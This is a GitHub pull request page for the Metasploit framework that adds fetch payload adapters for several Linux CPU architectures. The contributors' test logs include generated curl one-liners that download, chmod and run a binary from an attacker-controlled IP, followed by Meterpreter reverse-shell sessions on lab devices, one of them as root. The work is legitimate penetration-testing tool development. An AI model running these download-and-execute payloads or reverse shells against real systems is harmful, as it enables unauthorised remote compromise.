Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 #19850

Open
wants to merge 7 commits into
base: master
Choose a base branch
from
Open

Add fetch payloads for aarch64, armbe, armle, mipsbe, mipsle, ppc, ppc64 #19850

wants to merge 7 commits into from
+694 −0

Conversation

bwatters-r7
Copy link
Contributor

Adding several arch adapters to increase fetch payload coverage.
Please await testing.

@bwatters-r7
Copy link
Contributor Author

bwatters-r7 commented Jan 30, 2025
edited by dledda-r7
Loading

AARCH64 STAGELESS

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.149 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > use payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > generate -f raw
[-] Payload generation failed: One or more options failed to validate: LHOST.
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > generate -f raw
curl -sko /tmp/QmFuhTnL https://10.5.135.201:8080/d7GiQGdEoodZ84-t6UNmYg;chmod +x /tmp/QmFuhTnL;/tmp/QmFuhTnL&
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:60240) at 2025-01-30 15:24:27 -0600

msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.149 - Meterpreter session 2 closed.  Reason: Died
msf6 payload(cmd/linux/https/aarch64/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/syKtpABbG tftp://10.5.135.201:8080/rO0FgHU1uz_fQ-O3YyXWaA;chmod +x /tmp/syKtpABbG;/tmp/syKtpABbG&
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) >
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.132.149:39082) at 2025-01-30 15:25:19 -0600

msf6 payload(cmd/linux/tftp/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux

EDIT (@dledda-r7)

AARCH64 STAGED

Using qemu-aarch64-static

msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > generate -f
curl -so /tmp/iNqFqLGm http://172.26.133.223:8080/otevclxI8w0bUs3qv_y3Dw;chmod +x /tmp/iNqFqLGm;/tmp/iNqFqLGm&
msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > 
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (953388 bytes) to 172.26.133.223
[*] Meterpreter session 4 opened (172.26.133.223:4444 -> 172.26.133.223:34684) at 2025-02-04 13:31:46 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : 172.26.133.223
OS           : Debian  (Linux 6.11.2-amd64)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter >

@bwatters-r7
Copy link
Contributor Author

ARMEL

msf6 payload(cmd/linux/tftp/armle/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4441 -> 10.5.134.124:51028) at 2025-01-30 16:42:37 -0600

msf6 payload(cmd/linux/tftp/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : debian-armel.""
OS           : Debian 6.0.10 (Linux 2.6.32-5-versatile)
Architecture : armv5tejl
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > exit
[*] Shutting down session: 1

This system did not have cURL or TFTP

@bwatters-r7
Copy link
Contributor Author

MIPSLE

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8080
FETCH_SRVPORT => 8080
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set lport 4441
lport => 4441
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/NvpFcezafvU http://10.5.135.201:8080/rrP6zvtTemFbQhNqsbSjgA;chmod +x /tmp/NvpFcezafvU;/tmp/NvpFcezafvU&
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 16

[*] Started reverse TCP handler on 10.5.135.201:4441
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) >
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set lport 4442
lport => 4442
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -sko /tmp/pKTiqTdcSXX https://10.5.135.201:8081/YPmJ9swoEPYA_F8mtNz5pg;chmod +x /tmp/pKTiqTdcSXX;/tmp/pKTiqTdcSXX&
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 17
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) >
msf6 payload(cmd/linux/https/mipsle/meterpreter_reverse_tcp) > use payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set FETCH_SRVPORT 8082
FETCH_SRVPORT => 8082
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set FETCH_COMMAND CURL
FETCH_COMMAND => CURL
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set lport 4443
lport => 4443
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > generate -f raw
curl -so /tmp/LJUUbmrlBJ tftp://10.5.135.201:8082/NISRlXNmxW2uTHn_9QWATw;chmod +x /tmp/LJUUbmrlBJ;/tmp/LJUUbmrlBJ&
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 18

[*] Started reverse TCP handler on 10.5.135.201:4443
msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > [*] Meterpreter session 4 opened (10.5.135.201:4441 -> 10.5.132.135:49706) at 2025-01-30 17:00:10 -0600
[*] Started reverse TCP handler on 10.5.135.201:4442
[*] Meterpreter session 5 opened (10.5.135.201:4442 -> 10.5.132.135:47960) at 2025-01-30 17:00:18 -0600
[*] Meterpreter session 6 opened (10.5.135.201:4443 -> 10.5.132.135:35328) at 2025-01-30 17:00:23 -0600

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > sessions -l

Active sessions
===============

  Id  Name  Type                      Information         Connection
  --  ----  ----                      -----------         ----------
  4         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4441 -> 10.5.132.135:49706 (10.5.132.135)
  5         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4442 -> 10.5.132.135:47960 (10.5.132.135)
  6         meterpreter mipsle/linux  ubnt @ 192.168.1.1  10.5.135.201:4443 -> 10.5.132.135:35328 (10.5.132.135)

msf6 payload(cmd/linux/tftp/mipsle/meterpreter_reverse_tcp) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 4 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
[*] Running 'sysinfo' on meterpreter session 5 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
[*] Running 'sysinfo' on meterpreter session 6 (10.5.132.135)
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.14.54-UBNT)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux

@dledda-r7 dledda-r7 self-assigned this Jan 31, 2025
@jheysel-r7 jheysel-r7 mentioned this pull request Jan 31, 2025
Open
8 tasks
@jheysel-r7
Copy link
Contributor

Hey @dledda-r7 as per our slack discussion I'm just linking this testing done by @h00die-gr3y who found an issue when testing the staged versions of some of the newly supported architectures for fetch payloads.

#19841 (comment)

@bwatters-r7
Copy link
Contributor Author

MIPSBE

msf6 payload(cmd/linux/http/mipsbe/meterpreter_reverse_tcp) > [*] Client 10.5.134.124 requested /KGrf3Ppw2f7d4FyPVpCzyQ
[*] Sending payload to 10.5.134.124 (Wget/1.12 (linux-gnu))
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.124:40302) at 2025-02-05 15:52:06 -0600

msf6 payload(cmd/linux/http/mipsbe/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : debian-mips.""
OS           : Debian 6.0.8 (Linux 2.6.32-5-4kc-malta)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: root
meterpreter >

@bwatters-r7
Copy link
Contributor Author

Closes #19848

cdelafuente-r7
cdelafuente-r7 reviewed Feb 6, 2025
View reviewed changes
modules/payloads/adapters/cmd/linux/http/ppc.rb Outdated Show resolved Hide resolved
modules/payloads/adapters/cmd/linux/http/ppc64.rb Outdated Show resolved Hide resolved
modules/payloads/adapters/cmd/linux/https/ppc64.rb Outdated Show resolved Hide resolved
modules/payloads/adapters/cmd/linux/tftp/ppc.rb Outdated Show resolved Hide resolved
modules/payloads/adapters/cmd/linux/tftp/ppc64.rb Outdated Show resolved Hide resolved
@bwatters-r7 bwatters-r7 marked this pull request as ready for review February 11, 2025 13:49
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@dledda-r7 dledda-r7

Labels
arm arm payload
Projects
Metasploit Kanban
Status: Todo
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@bwatters-r7 @jheysel-r7 @cdelafuente-r7 @dledda-r7